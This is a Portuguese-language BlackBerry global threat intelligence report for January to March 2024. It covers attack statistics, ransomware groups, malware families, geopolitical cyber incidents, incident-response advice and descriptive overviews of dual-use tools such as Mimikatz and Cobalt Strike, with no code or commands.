Relatório de inteligência sobre ameaças globais

Edição de junho de 2024

Período do relatório: 1º de janeiro a 31 de março de 2024

Inteligência acionável que importa

Este relatório BlackBerry fornece uma análise abrangente do cenário global de ameaças para o período de janeiro a março de 2024. Os destaques do relatório incluem:

Observamos mais de 630.000 hashes maliciosos, um aumento de mais de 40% por minuto em relação ao período do relatório anterior.

Leia mais naseção Total de ataques neste período.

60% de todos os ataques foram contra infraestruturas essenciais. Desses, 40% tiveram como alvo o setor financeiro.

Encontre os detalhes na seção Infraestrutura crítica seção.

56% dos CVEs foram classificados como 7,0 ou mais (sendo 10 o mais grave). Os CVEs foram rapidamente transformados em armas em todas as formas de malware, especialmente ransomware e infostealers.

Saiba mais naseção Vulnerabilidades e exposições comuns.

Nova seção sobre ransomware: Incluímos uma nova seção sobre os principais grupos de ransomware em todo o mundo e o ransomware mais ativo neste período do relatório.

Saiba mais na seção Quem é quem em Ransomware.

Os relatórios BlackBerry® Global Threat Intelligence são publicados a cada três meses. Essas atualizações frequentes permitem que os CISOs e outros importantes tomadores de decisão se mantenham informados sobre as mais recentes ameaças e desafios de segurança cibernética em seus setores e localizações geográficas.

O relatório é o ponto culminante da pesquisa, análise e conclusões da nossa equipe de Inteligência sobre Ameaças Cibernéticas (CTI), da nossa equipe de Resposta a Incidentes (IR) e dos especialistas em segurança da nossa divisão CylanceMDR. Continue rolando a tela para saber mais, fazer o download do pdf ou ler o resumo executivo.

Total de ataques neste período

De janeiro a março de 2024, as soluções de segurança cibernética daBlackBerry interromperam mais de 3.100.000 ataques cibernéticos: isso equivale a mais de 37.000 ataques cibernéticos interrompidos por dia. Além disso, observamos uma média de 7.500 amostras exclusivas de malware por dia direcionadas à nossa base de clientes.
Figura 1: hashes de malware exclusivos por minuto encontrado. (*O período de setembro de 2023 a dezembro de 2023 abrangeu 120 dias).

Como você observará neste relatório, o total de ataques não está necessariamente correlacionado com o número de hashes exclusivos (novo malware). Como ilustram as figuras 2 a 6 nas próximas duas seções, nem todo ataque utiliza malware exclusivo. Isso depende da motivação do atacante, da complexidade do ataque e do objetivo - por exemplo, roubo de informações ou roubo financeiro.

BlackBerry As soluções de segurança cibernética interromperam mais de 3.100.000 ataques cibernéticos: isso equivale a mais de 37.000 ataques cibernéticos interrompidos por dia.

Ataques por país

Ataques interrompidos

A Figura 2 abaixo mostra os cinco principais países onde as soluções de segurança cibernética da BlackBerry impediram a maioria dos ataques cibernéticos. As organizações que utilizam as soluções da BlackBerry nos Estados Unidos receberam o maior número de tentativas de ataques neste período do relatório. Na região da Ásia-Pacífico (APAC), o Japão, a Coreia do Sul e a Austrália também sofreram um alto nível de ataques, o que lhes rendeu lugares entre os cinco primeiros. Na América Latina (LATAM), os clientes de Honduras foram muito visados, o que garantiu a esse país o quinto lugar em nossa lista.

 

Malware exclusivo

Nesse período de relatório, o BlackBerry observou um aumento de mais de 40% por minuto em novos hashes (malware exclusivo), em comparação com o período de setembro a dezembro de 2023 (Figura 1). A Figura 2 mostra os cinco países onde as soluções de segurança cibernética da BlackBerry registraram o maior número de hashes de malware exclusivos, com os Estados Unidos recebendo o maior número. A Coreia do Sul, o Japão e a Austrália, na região da Ásia-Pacífico, mantiveram suas classificações do último período de três meses, enquanto o Brasil entra na lista como um novo participante.

Figura 2: Ataques interrompidos e malware exclusivo encontrado, classificados por país.
Novamente, ao comparar as figuras 3a e 3b, você verá que o total de ataques interrompidos não está necessariamente correlacionado com o número de hashes exclusivos registrados. Ferramentas e táticas exclusivas e personalizadas podem ser desenvolvidas por um agente de ameaças com muitos recursos que deseja atacar um alvo específico e de alto valor, como o CFO de uma determinada empresa. Os deepfakes são cada vez mais usados para atingir vítimas específicas, como o uso de uma gravação de voz deepfake de um CEO para convencer o gerente financeiro da empresa a transferir dinheiro.
Figura 3a: Ataques interrompidos, classificados pelos cinco principais países afetados neste período do relatório, em comparação com o relatório anterior.
Figura 3b: hashes únicos, classificados para os principais países afetados neste período do relatório, em comparação com o relatório anterior.

Como veremos nas próximas seções, outros invasores podem querer danificar a infraestrutura física, como um serviço público, explorando uma vulnerabilidade nos sistemas de controle ou infectando um dispositivo na rede

Ataques por setor

Assim como em nosso relatório anterior, consolidamos vários setores-chave da indústria em duas seções abrangentes: Infraestrutura crítica e Empresa comercial.

A infraestrutura crítica, conforme definida pela Cybersecurity and Infrastructure Security Agency (CISA), abrange 16 setores, incluindo saúde, governo, energia, agricultura, finanças e defesa.

A crescente digitalização desses setores significa que seus ativos estão mais vulneráveis aos criminosos cibernéticos. Os agentes de ameaças exploram ativamente os sistemas críticos por meio de vulnerabilidades, como configurações incorretas do sistema e campanhas de engenharia social contra funcionários.

As empresas comerciais incluem manufatura, bens de capital, serviços comerciais e profissionais e varejo. As empresas são sempre alvos tentadores para ataques cibernéticos, e o aumento do uso de dispositivos conectados e da computação em nuvem facilitou a violação de seus sistemas. Os invasores também se tornaram mais sofisticados, geralmente usando engenharia social para obter credenciais de contas e distribuir malware.

Figura 4: Ataques específicos do setor interrompidos versus malware exclusivo.

Destaque da história cibernética: Bancos internacionais

Bancos mexicanos e plataformas de criptomoeda visados pelo AllaKore RAT

Em janeiro, os analistas de ameaças cibernéticas do site BlackBerry descobriram uma campanha de longa duração e com motivação financeira que visava bancos mexicanos e plataformas de negociação de criptomoedas com o AllaKore RAT, uma ferramenta de acesso remoto de código aberto modificada. Os agentes da ameaça usaram iscas que imitavam o Instituto Mexicano de Seguridade Social (IMSS) e documentos legítimos para distrair os usuários durante o processo de instalação, permitindo que eles roubassem credenciais bancárias e informações de autenticação. Essa campanha está em andamento desde 2021, com foco em grandes empresas mexicanas com faturamento superior a US$ 100 milhões. BlackBerry As descobertas da empresa sugerem que o agente da ameaça provavelmente está sediado na América Latina, dado o uso de IPs Starlink do México e instruções em espanhol na carga útil do RAT. Leia o artigo completo em nosso blog para saber mais.

Leia a história completa

Ameaças à infraestrutura crítica

Com base em nossa telemetria interna, dos ataques cibernéticos específicos do setor encontrados pelas soluções de segurança cibernética da BlackBerry , 60% foram direcionados à infraestrutura essencial. Além disso, 32% dos hashes de malware exclusivos visavam locatários de infraestrutura essencial.

CylanceENDPOINT e outras soluções de segurança cibernética da BlackBerry interromperam mais de 1,1 milhão de ataques contra setores críticos da indústria, que incluem finanças, saúde, governo e serviços públicos. Quase metade desses 1,1 milhão de ataques ocorreu no setor financeiro. Além disso, as organizações do governo e do setor público sofreram a maior diversidade de ataques, com mais de 36% dos hashes exclusivos direcionados a esse setor.

Figura 5: Detalhamento de ataques interrompidos e malware exclusivo direcionado a infraestruturas críticas.


BlackBerry A telemetria registrou várias famílias de malware predominantes direcionadas a infraestruturas críticas em todo o mundo. Por exemplo, o famoso infostealer LummaStealer foi observado especificamente visando os setores de alimentos e agricultura na América Latina e o setor de energia na região da APAC. As ameaças notáveis observadas durante o período do relatório incluem:

  • 8Base ransomware: Operação de ransomware | Setor de saúde
  • Amadey (Amadey Bot): Botnet multifuncional para instalações governamentais
  • Buhti: Operação de ransomware | Imóveis comerciais
  • LummaStealer (LummaC2): Infostealer baseado em C | Setor de alimentos e agricultura (LATAM) e setor de energia (APAC)
  • PrivateLoader: Família de downloaders | Setor de energia
  • Remcos (RemcosRAT): Ferramenta de acesso remoto (RAT) de nível comercial | Setor de alimentos e agricultura
  • Vidar (VidarStealer): Infostealer de commodities | Vários setores:
    • O setor de energia nos países da APAC
    • O setor de TI nos países da América Latina
    • O setor de serviços financeiros na América do Norte
    • O setor de instalações governamentais na Europa, no Oriente Médio e na África (EMEA)

Detalhes sobre essas ameaças à infraestrutura crítica estão disponíveis no Apêndice.

Figura 6: Ameaças predominantes à infraestrutura essencial por região.


Ameaças externas enfrentadas pela infraestrutura crítica

As ameaças externas são ataques cibernéticos registrados fora da telemetria interna do BlackBerry. Durante o último período do relatório, o cenário mais amplo de ameaças globais registrou vários ataques notáveis contra infraestruturas essenciais.

Continuam as ramificações da violação ocorrida no final de 2023 no Idaho National Laboratory (INL), com sede nos EUA, uma instalação de pesquisa do Departamento de Energia dos EUA (DOE). Os invasores violaram a plataforma de gerenciamento de RH baseada em nuvem do laboratório, a Oracle HCM, e roubaram os dados pessoais de mais de 45.000 pessoas. O grupo hacktivista SiegedSec reivindicou a responsabilidade pelo ataque nas semanas seguintes e publicou uma parte dos dados roubados em um fórum de vazamentos on-line. A Figura 7 apresenta uma linha do tempo de ameaças notáveis contra infraestruturas essenciais que ocorreram durante o período do relatório.

Figura 7: Ataques externos notáveis contra infraestruturas críticas.

Destaque da história cibernética: infraestrutura, VPNs e confiança zero

Diretriz de emergência revela que pode ser hora de substituir as VPNs

A funcionalidade principal das redes privadas virtuais (VPNs) permaneceu praticamente inalterada desde sua criação em 1996, mas as recentes violações de segurança de alto nível e as diretrizes governamentais sugerem que talvez seja hora de reconsiderar seu uso.

Um dos principais problemas é o modelo "confie, mas verifique" das VPNs, que inerentemente concede confiança aos usuários dentro do perímetro da rede, tornando-os vulneráveis a ataques cibernéticos. Destacando esse risco, a Agência de Segurança Cibernética e de Infraestrutura (CISA) emitiu recentemente diretrizes de emergência que abordam vulnerabilidades críticas de VPNs, solicitando a rápida desconexão de produtos em risco. Leia a história completa em nosso blog.

Leia a história completa

Ameaças a empresas comerciais

Assim como os setores são afetados pelas ameaças à segurança cibernética, as empresas individuais também enfrentam ataques cibernéticos, especialmente porque tendem a depender mais da infraestrutura digital para finanças, comunicações, vendas, compras e outras operações comerciais. Tudo, desde start-ups até conglomerados multinacionais, é suscetível a ameaças cibernéticas, especialmente ransomware.

Durante o último período do relatório, as soluções de segurança cibernética da BlackBerry bloquearam 700.000 ataques direcionados a indústrias do setor de empresas comerciais.

Com base em nossa telemetria interna, em comparação com o período do relatório anterior, as empresas comerciais viram:

  • um aumento de 2% no número de ataques que enfrentaram.
  • um aumento de 10% nos hashes exclusivos encontrados.
Figura 8: Ataques interrompidos e malware exclusivo no espaço das empresas comerciais.


As empresas comerciais enfrentam ameaças de infostealers vendidos por meio de operações de malware como serviço (MaaS). Muitas vezes, essas ameaças implantam malware adicional no dispositivo da vítima. Elas continuam a evoluir em uma corrida armamentista cibernética para contornar os produtos de segurança e o software antivírus (AV) tradicional. O malware predominante observado na telemetria do site BlackBerry inclui:

  • RedLine (RedLine Stealer): Infostealer (Roubador de informações)
  • SmokeLoader: Malware comumente utilizado e versátil
  • PrivateLoader: Facilitador de malware
  • RaccoonStealer: MaaS infostealer
  • LummaStealer (LummaC2): Roubador de informações de malware

Detalhes sobre essas ameaças às empresas comerciais estão disponíveis no Apêndice.

Figura 9: Ameaças predominantes a empresas comerciais por região.


Ameaças externas enfrentadas pela empresa comercial

O ransomware é um flagelo predominante contra organizações de todos os tamanhos e orientações comerciais. Exemplos recentes de ataques de ransomware incluem:

  • A VF Corporation - fabricante norte-americana de marcas conhecidas de roupas esportivas, como Timberland, The North Face e Vans - foi vítima de um ataque de ransomware da gangue ALPHV ransomware em dezembro de 2023. Os invasores roubaram os dados de mais de 35 milhões de clientes, causando atrasos no atendimento de pedidos e outras interrupções durante a importante temporada de férias.
  • A Coop Värmland, uma rede de supermercados sueca, teve seu movimentado período de férias interrompido por um ataque de ransomware perpetrado pela gangue do ransomware Cactus.
  • Um conhecido fabricante alemão, a ThyssenKrupp, sofreu uma violação em sua subdivisão automotiva em fevereiro de 2024. Mais tarde, a empresa disse que o ataque foi um ataque de ransomware fracassado.
  • Em março, o grupo de ransomware Stormous atacou a cervejaria belga Duvel Moortgat, produtora de mais de 20 marcas de cerveja, e roubou 88 GB de dados.

Quem é quem em ransomware

Como os eventos acima destacam, o ransomware tem sido uma ameaça predominante noRelatório de Inteligência sobre Ameaças Globais do site BlackBerry . Para este relatório, introduzimos uma seção específica sobre grupos de ransomware ativos no período do relatório.

O ransomware é uma ferramenta universal adotada por criminosos cibernéticos e sindicatos organizados, visando vítimas em todos os setores do mundo. A maioria desses grupos tem motivação financeira; eles adaptam rapidamente novas táticas e técnicas para burlar as defesas tradicionais de segurança cibernética e exploram rapidamente qualquer nova vulnerabilidade de segurança.

O ransomware está cada vez mais direcionado às organizações da área de saúde, uma tendência preocupante. A área de saúde é um setor lucrativo para os grupos de ransomware devido à crescente digitalização dos registros de saúde e às graves consequências que podem ocorrer se esses serviços forem interrompidos. Com ataques notáveis ocorrendo globalmente durante o período deste relatório, esses sindicatos agressivos podem colocar vidas em risco e restringir ou cortar o acesso dos profissionais de saúde aos dados cruciais de informações pessoais identificáveis (PII) dos pacientes. 

Os ataques ao setor de saúde podem ter sérios efeitos indiretos, prejudicando hospitais, clínicas, farmácias e dispensários de medicamentos, impedindo que os pacientes obtenham medicamentos vitais, fazendo com que as ambulâncias sejam redirecionadas e interrompendo o agendamento de procedimentos médicos. Os impactos secundários incluem o vazamento de dados e a venda de informações pessoais confidenciais de pacientes na dark web. Por esse motivo, prevemos que o setor de saúde continuará a ser alvo de ataques pesados, tanto públicos quanto privados, ao longo de 2024.

Principais participantes de ransomware neste período do relatório

Veja a seguir os grupos de ameaças de ransomware notáveis de todo o mundo que estiveram ativos no período do relatório:

Figura 10: Grupos/famílias de ransomware notáveis ativos de janeiro a março de 2024.


Hunters International
O Hunters International, um sindicato do crime de ransomware como serviço (RaaS) que está em operação desde o final de 2023, ganhou destaque no início de 2024. O grupo é possivelmente um desdobramento do grupo de ransomware Hive, que foi fechado pelas autoridades policiais no início de 2023. Esse grupo emprega um esquema de extorsão dupla que envolve primeiro criptografar os dados da vítima para obter um resgate e, em seguida, exigir mais dinheiro ameaçando publicar publicamente os dados roubados. Atualmente, o Hunters International está ativo em todo o mundo.

8Base
Inicialmente observado em 2022, o grupo de ransomware 8Base ganhou destaque no final de 2023. Esse grupo prolífico usa uma variedade de táticas, técnicas e procedimentos (TTPs) e pode ser altamente oportunista. O grupo costuma explorar rapidamente vulnerabilidades recém-divulgadas e utiliza vários ransomwares, inclusive o Phobos

LockBit
O LockBit, um grupo de ransomware baseado na Rússia, é especializado em fornecer RaaS por meio de seu malware homônimo. Descoberto em 2020, o ransomware LockBit se tornou um dos grupos de ransomware mais agressivos. Os aspectos incluem:

  • Ferramentas personalizadas para exfiltrar os dados da vítima antes da criptografia e hospedá-los por meio de um site de vazamento na dark web.
  • Visa principalmente vítimas na América do Norte e, secundariamente, na América Latina.
  • Emprega uma estratégia de extorsão dupla.

Em fevereiro de 2024, a Operação Cronos, um esforço internacional de aplicação da lei, interrompeu as operações do LockBit. No entanto, o LockBit parece ter se recuperado desde então e continua sendo um dos principais participantes no espaço do ransomware.

Play
Observado inicialmente em 2022, o Play é um grupo de ransomware multiextorsão que hospeda dados roubados em sites baseados em TOR que permitem a comunicação anônima, ameaçando que os dados serão vazados se o pagamento do resgate não for feito. O Play geralmente tem como alvo pequenas e médias empresas (SMBs), principalmente na América do Norte, mas também na região EMEA durante o período do relatório. O grupo utiliza amplamente ferramentas prontas para uso, como Cobalt Strike, Empire e Mimikatz, para descoberta e TTPs de movimentação lateral. O grupo também utilizou o Grixba, uma ferramenta personalizada de reconhecimento e roubo de informações que é usada antes da execução do ransomware.

BianLian
O BianLian é um ransomware baseado em GoLang que está à solta desde 2022. O grupo associado tem estado ativo neste período do relatório, tendo como alvo principal as vítimas baseadas na América do Norte. Como muitos grupos de ransomware, o BianLian explora muito as vulnerabilidades divulgadas recentemente, geralmente visando empresas menores em vários setores. Ele usa várias ferramentas prontas para uso, como PingCastle, Advance Port Scanner e SharpShares, para se estabelecer em um sistema-alvo antes de exfiltrar dados confidenciais e executar o ransomware. Esses dados roubados são então aproveitados como tática de extorsão até que o resgate seja pago.

ALPHV
Frequentemente chamado de BlackCat ou Noberus, o ALPHV é uma operação de RaaS que existe desde o final de 2021. O grupo de ameaças por trás do ALPHV é altamente sofisticado, aproveitando a linguagem de programação Rust para atacar sistemas operacionais baseados em Windows, Linux e VMWare. O ALPHV tende a visar vítimas norte-americanas.

Os grupos de ransomware... adaptam rapidamente novas táticas e técnicas para burlar as defesas tradicionais de segurança cibernética e exploram rapidamente qualquer nova vulnerabilidade de segurança.

Destaque da história cibernética: Ransomware e o setor de saúde

12 dias sem receita: A queda do ransomware continua no setor de saúde

Em março, o setor de saúde sofreu um ataque de ransomware "sem precedentes" que interrompeu as operações em hospitais e farmácias, de acordo com a American Hospital Association (AHA). O ataque à Change Healthcare, que processa 15 bilhões de transações de saúde anualmente, afetou gravemente os serviços de atendimento ao paciente, como suporte a decisões clínicas e operações de farmácia. Essa interrupção levou a uma paralisação de 12 dias na receita das práticas médicas afetadas e deixou os pacientes com dificuldades para acessar prescrições vitais. Com o Escritório de Direitos Civis do Departamento de Saúde e Serviços Humanos dos EUA agora investigando, os dados mais recentes revelam um aumento significativo nas ameaças cibernéticas, com um aumento de 256% nas grandes violações de hackers nos últimos cinco anos. O incidente ressalta a necessidade crítica de medidas aprimoradas de segurança cibernética no setor de saúde. Para uma exploração detalhada dessa questão urgente, leia a história completa em nosso blog.

Leia a história completa

Análise geopolítica e comentários

Os conflitos geopolíticos impulsionam cada vez mais os ataques cibernéticos. As tecnologias digitais podem ser ferramentas poderosas para o bem, mas também podem ser usadas de forma abusiva por agentes estatais e não estatais. Nos primeiros três meses de 2024, legisladores da Europa, da América do Norte e da região Ásia-Pacífico foram vítimas de campanhas de spyware direcionadas. Agentes de ameaças invadiram os sistemas de TI de vários departamentos governamentais, comprometeram sistemas militares e interromperam infraestruturas essenciais em todo o mundo.

Embora os motivos que levam a essas intrusões sejam muitas vezes complexos e opacos, os incidentes recentes mais significativos envolveram grandes divisões geopolíticas, como a invasão da Ucrânia pela Rússia, a agressão crescente entre Israel e o Irã e as tensões contínuas no Mar do Sul da China e na região do Indo-Pacífico.

Na Ucrânia, as dimensões cibernéticas da guerra continuam a se arrastar. Ao contrário das normas internacionais que regem a conduta legal no espaço cibernético, os ataques lançados contra a Ucrânia continuam a não distinguir entre infraestrutura civil e militar. Em janeiro, agentes russos acessaram webcams residenciais em Kiev, supostamente para coletar informações sobre os sistemas de defesa aérea da cidade antes de lançar um ataque com mísseis contra a cidade. De acordo com os relatórios, os invasores manipularam os ângulos das câmeras para coletar informações sobre infraestruturas críticas próximas para um direcionamento mais preciso dos mísseis.

Os agentes russos de ameaças cibernéticas também foram associados a um ataque contra a maior operadora de telefonia móvel da Ucrânia, a Kyivstar, destruindo uma infraestrutura significativa e cortando o acesso de 24 milhões de clientes na Ucrânia. Esse ataque ocorreu poucas horas antes de o presidente Biden se reunir com o presidente Zelenskyy em Washington D.C. Os legisladores da UE também descobriram que seus telefones haviam sido infectados com spyware. Muitos desses legisladores eram membros do subcomitê de segurança e defesa do Parlamento Europeu, responsável por fazer recomendações sobre o apoio da UE à Ucrânia. Em março, invasores russos também interceptaram conversas entre oficiais militares alemães sobre o possível apoio militar à Ucrânia, reforçando a necessidade de proteger as comunicações contra o aumento das tentativas de espionagem.

Com o aumento das atividades militares entre Irã e Israel, também aumentaram os ataques cibernéticos contra sites do governo israelense. Em retaliação, os agentes de ameaças israelenses interromperam 70% dos postos de gasolina no Irã. Enquanto isso, os EUA lançaram um ataque cibernético contra um navio espião militar iraniano no Mar Vermelho que estava compartilhando inteligência com os rebeldes Houthi.

Na região do Indo-Pacífico, os ataques cibernéticos e as campanhas de espionagem atribuídos a grupos apoiados pela China continuaram a aumentar. O Conselho de Revisão de Segurança Cibernética do Departamento de Segurança Interna dos EUA divulgou um relatório importante sobre o Incidente do Microsoft Online Exchange do verão de 2023 e documentou em detalhes como os invasores apoiados pela China roubaram o código-fonte da Microsoft. O grupo de ameaças Storm-0558 comprometeu funcionários e autoridades do Departamento de Estado dos EUA, do Departamento de Comércio dos EUA, da Câmara dos Deputados dos EUA e de vários departamentos governamentais do Reino Unido. De acordo com o relatório, o agente da ameaça conseguiu baixar aproximadamente 60.000 e-mails somente do Departamento de Estado.

Esse não foi um incidente isolado. Em março de 2024, o Departamento de Justiça dos EUA e o FBI revelaram que atacantes chineses tinham como alvo vários membros do Reino Unido, da UE, dos EUA e do Canadá da Aliança Interparlamentar sobre a China.

Conforme observado anteriormente, os ataques contra infraestruturas essenciais aumentaram, principalmente nos setores financeiro e de saúde. Nos primeiros três meses de 2024, uma violação maciça de dados de uma empresa francesa de seguro de saúde levou ao vazamento de informações pessoais confidenciais. No Canadá, o Centro de Análise de Transações Financeiras e Relatórios (FINTRAC) desligou seus sistemas após um incidente cibernético. Em resposta, o governo canadense alocou CAN$ 27 milhões para melhorar a resiliência cibernética do FINTRAC e construir proteções de segurança de dados.

Os governos de todo o mundo estão investindo em uma segurança cibernética mais forte diante do aumento da espionagem cibernética e das tentativas de ataques cibernéticos. O Canadá anunciou recentemente níveis históricos de investimento em suas defesas cibernéticas, e o Reino Unido aumentou seus gastos com defesa para 2,5% do PIB. A segurança cibernética continua sendo um dos principais riscos tanto para os governos quanto para os atores do setor privado, e essa tendência provavelmente continuará enquanto as tensões geopolíticas continuarem a aumentar.

Observações sobre a resposta a incidentes

A resposta a incidentes (IR) é uma abordagem de nível empresarial para gerenciar ataques cibernéticos e incidentes de segurança cibernética. O objetivo da resposta a incidentes é conter e minimizar rapidamente os danos causados por uma violação, além de reduzir o tempo e os custos de recuperação. Toda organização precisa de um plano de IR e de um serviço de IR interno ou terceirizado. BlackBerry® Cybersecurity Services - que inclui resposta a incidentes cibernéticos, resposta a violações de dados, resposta a comprometimento de e-mail comercial, resposta a ransomware e perícia digital - fornece planos rápidos de resposta a incidentes para ajudar a reduzir o impacto de qualquer ataque cibernético e garantir que a recuperação digital siga as práticas recomendadas.
Figura 11: BlackBerry Detalhamento do engajamento de RI.


Observações da equipe de resposta a incidentes do site BlackBerry

Este é um resumo dos tipos de compromissos de RI aos quais a equipe do BlackBerry respondeu, bem como das medidas de segurança que as organizações podem adotar para evitar essas violações.

  • Intrusão na rede: Incidentes em que o vetor de infecção inicial foi um sistema vulnerável voltado para a Internet, como um servidor da Web ou um dispositivo de rede privada virtual (VPN). Em alguns casos, a violação levou à implantação de ransomware no ambiente do alvo e à exfiltração de dados.
    • Prevenção: Aplicar atualizações de segurança a todos os sistemas expostos à Internet em tempo hábil. (MITRE - Serviços Remotos Externos, T1133).
  • Conduta imprópria de insiders: Um funcionário atual e/ou antigo acessou os recursos da empresa sem autorização.  
    • Prevenção: Implemente controles de segurança de autenticação forte em todos os sistemas. Implemente procedimentos formais de integração de funcionários da empresa. (MITRE - Contas válidas: contas na nuvem, T1078.004.)
  • Ransomware: Dez por cento de todos os incidentes respondidos foram baseados em ransomware.
    • Prevenção: Faça o patch dos serviços voltados para a Internet, como e-mail, VPNs e servidores da Web, em tempo hábil. Isso pode impedir que um agente de ameaças acesse e atinja seus objetivos, como a implantação de ransomware, depois de obter acesso a uma rede corporativa por meio de um dispositivo ou sistema vulnerável. (MITRE - Serviços Remotos Externos, T1133).
    • Prevenção: Certifique-se de que a organização tenha duas cópias de todos os dados críticos armazenados em dois formatos de mídia diferentes da fonte de dados original, com pelo menos uma cópia fora do local.

A detecção, a contenção e a recuperação de um incidente de segurança cibernética exigem detecção e resposta rápidas para limitar os danos. É imperativo que as organizações tenham um plano de resposta a incidentes bem documentado, juntamente com pessoal treinado e recursos prontos para agir imediatamente aos primeiros sinais de uma possível violação. Isso garante que as equipes de segurança possam detectar os problemas o mais cedo possível, conter e erradicar rapidamente as ameaças e reduzir os impactos sobre a reputação da marca e dos negócios, as perdas monetárias e os riscos legais para a organização.

Atores de ameaça e ferramentas

Atores de ameaça

Dezenas de grupos de ameaças realizaram ataques cibernéticos nos primeiros três meses de 2024. Destacamos aqui os ataques mais impactantes.

LockBit

O LockBit é um grupo de criminosos cibernéticos com afiliações à Rússia. Os operadores do grupo mantêm e aprimoram diligentemente seu ransomware homônimo, supervisionando as negociações e orquestrando sua implantação quando ocorre uma violação bem-sucedida. Empregando estratégias de extorsão dupla, o ransomware LockBit não apenas criptografa os dados locais para restringir o acesso da vítima, mas também exfiltra informações confidenciais e ameaça expô-las publicamente, a menos que o resgate seja pago.

Em fevereiro, a NCA, o FBI e a Europol, por meio de um esforço global coordenado denominado "Operação Cronos", colaboraram com agências de aplicação da lei em 10 países para assumir o controle da infraestrutura e do site de vazamento do grupo LockBit, coletar informações de seus servidores, efetuar prisões e impor sanções.

No entanto, menos de uma semana depois, o grupo de ransomware se reagrupou e retomou seus ataques, empregando criptografadores atualizados e notas de resgate que direcionam as vítimas para novos servidores após a interrupção da aplicação da lei.

A LockBit reivindicou a responsabilidade por ataques cibernéticos contra várias redes, incluindo a rede hospitalar Capital Health. Em ambos os casos, eles ameaçaram liberar dados confidenciais, a menos que fossem feitos pagamentos imediatos de resgate.

Rhysida

O Rhysida é um grupo RaaS relativamente novo que foi observado pela primeira vez no final de maio de 2023. Apesar de seu surgimento relativamente recente, o grupo rapidamente se estabeleceu como uma ameaça viável de ransomware. Seu primeiro ataque de alto nível teve como alvo o exército chileno, marcando o início de um aumento nos ataques de ransomware a instituições governamentais da América Latina.
O grupo Rhysida também atacou o varejista de iates MarineMax. O grupo Rhysida exfiltrou uma quantidade limitada de dados de seu ambiente, incluindo informações de clientes e funcionários, inclusive PII que podem ser usadas para roubo de identidade. Esses dados roubados agora estão sendo oferecidos para venda na dark web por 15 BTC - aproximadamente US$ 1.013.556 no momento em que este artigo foi escrito. Além disso, a Rhysida divulgou capturas de tela que supostamente mostram os documentos financeiros da MarineMax, juntamente com imagens de carteiras de motorista e passaportes de funcionários, em seu site de vazamento na dark web.

APT29

O APT29, também conhecido como Cozy Bear, Midnight Blizzard ou NOBELIUM, é um grupo de ameaças atribuído ao Serviço de Inteligência Estrangeira (SVR) da Rússia. O APT29 é conhecido por atacar governos, organizações políticas e de pesquisa, bem como infraestruturas críticas.

A CISA alertou recentemente que o APT29 expandiu suas metas para incluir outros setores e mais governos locais. Conhecido por usar uma ampla variedade de malwares personalizados, o grupo de ameaças também atacou recentemente serviços de nuvem usando contas de serviço comprometidas ou tokens de autenticação roubados.

Nesse período do relatório, o APT29 foi observado acessando uma conta de locatário de teste da Microsoft após um ataque de pulverização de senha e, em seguida, criando aplicativos OAuth mal-intencionados para acessar contas de e-mail corporativas. Além disso, eles atacaram partidos políticos alemães com o WINELOADER, um backdoor observado pela primeira vez em janeiro de 2024.

Akira

Visto pela primeira vez no início de 2023, o ransomware Akira tem sido observado como alvo de organizações de todos os setores. Ao acessar redes com serviços de VPN mal configurados ou vulneráveis, RDP voltado para o público, spear-phishing ou credenciais comprometidas, eles tentam criar contas de domínio ou encontrar credenciais para escalonamento de privilégios ou movimentação lateral nas redes.

Akira é conhecido por usar ferramentas como:

  • AdFind para consultar o Active Directory.
  • Mimikatz e LaZagne pelo acesso às credenciais.
  • Ngrok para fazer túneis em redes por trás de firewalls ou outras medidas de segurança.
  • AnyDesk para acesso remoto.
  • Advanced IP Scanner para localizar dispositivos em uma rede.

Principais ferramentas usadas pelos agentes de ameaças

Mimikatz

O Mimikatz é reconhecido por sua capacidade de extrair credenciais confidenciais do processo LSASS (Local Security Authority Subsystem Service) em sistemas Windows. 
Esse processo serve como repositório de credenciais de usuário após o login, o que o torna o principal alvo tanto para testadores de penetração éticos quanto para agentes mal-intencionados. O Mimikatz é um utilitário popular para avaliar a robustez das redes Windows. Os testadores de penetração legítimos podem usar o Mimikatz para descobrir vulnerabilidades críticas, enquanto os agentes de ameaças mal-intencionados podem usá-lo para aumentar os privilégios ou atravessar lateralmente as redes. Grupos de ameaças, como LockBit e Phobos, exploram seus recursos para executar ataques cibernéticos sofisticados.

Ataque de Cobalto

O Cobalt Strike, uma estrutura de simulação de adversários, replica a presença persistente de agentes de ameaças em ambientes de rede. A ferramenta tem dois componentes essenciais: um agente (Beacon) e um servidor (Team Server). O Team Server, que funciona como um servidor C2 de longo prazo hospedado na Internet, mantém comunicação constante com as cargas úteis do Beacon implantadas em máquinas comprometidas.
Embora o Cobalt Strike seja usado principalmente por testadores de penetração e equipes vermelhas para avaliar a postura de segurança das redes, ele também foi explorado por agentes de ameaças. O código do Cobalt Strike 4.0 vazou na Internet no final de 2020, o que levou à sua rápida transformação em arma por um conjunto diversificado de adversários mal-intencionados. A natureza dupla do Cobalt Strike destaca a importância da vigilância e de medidas robustas de segurança cibernética para atenuar os riscos associados ao seu uso indevido, protegendo as redes contra possíveis explorações.

Ngrok

O Ngrok é uma plataforma para expor sistemas internos à Internet. Ele fornece acesso em túnel a uma rede ou dispositivo por trás de firewalls. Depois de estabelecer um endpoint visível na Internet, o tráfego que vai para esse endpoint é enviado por meio de túneis TLS (Transport Layer Security) para o agente Ngrok correspondente na rede interna. Isso permite atividades como testes ad hoc rápidos de sistemas ou administração remota.
No entanto, essa funcionalidade também o torna uma ferramenta atraente para os invasores, fornecendo um canal seguro para comando e controle (C2) e exfiltração. No passado, ele foi usado por grupos de ameaças como ALPHV, Lazarus e Daixin Team.

ConnectWise

O ConnectWise ScreenConnect é uma ferramenta de administração de desktop remoto amplamente utilizada pelo suporte técnico, provedores de serviços gerenciados (MSPs) e outros profissionais para autenticar máquinas. 
Os agentes de ameaças podem abusar do ScreenConnect para se infiltrar em endpoints de alto valor e explorar privilégios. O ConnectWise abordou recentemente dois grandes problemas de segurança (CVE-2024-1709 e CVE-2024-1708) que poderiam permitir que invasores anônimos explorassem uma falha de desvio de autenticação e criassem contas de administrador em instâncias expostas publicamente.  

Ameaças predominantes por plataforma: Windows

Remcos

Trojan de acesso remoto

Remcos, abreviação de Remote Control and Surveillance, é um aplicativo usado para acessar remotamente o dispositivo de uma vítima.

Agente Tesla

Infostealer

O Agent Tesla é um cavalo de Troia baseado em .NET que é frequentemente vendido como um MaaS e é usado principalmente para coleta de credenciais.

RedLine

Infostealer

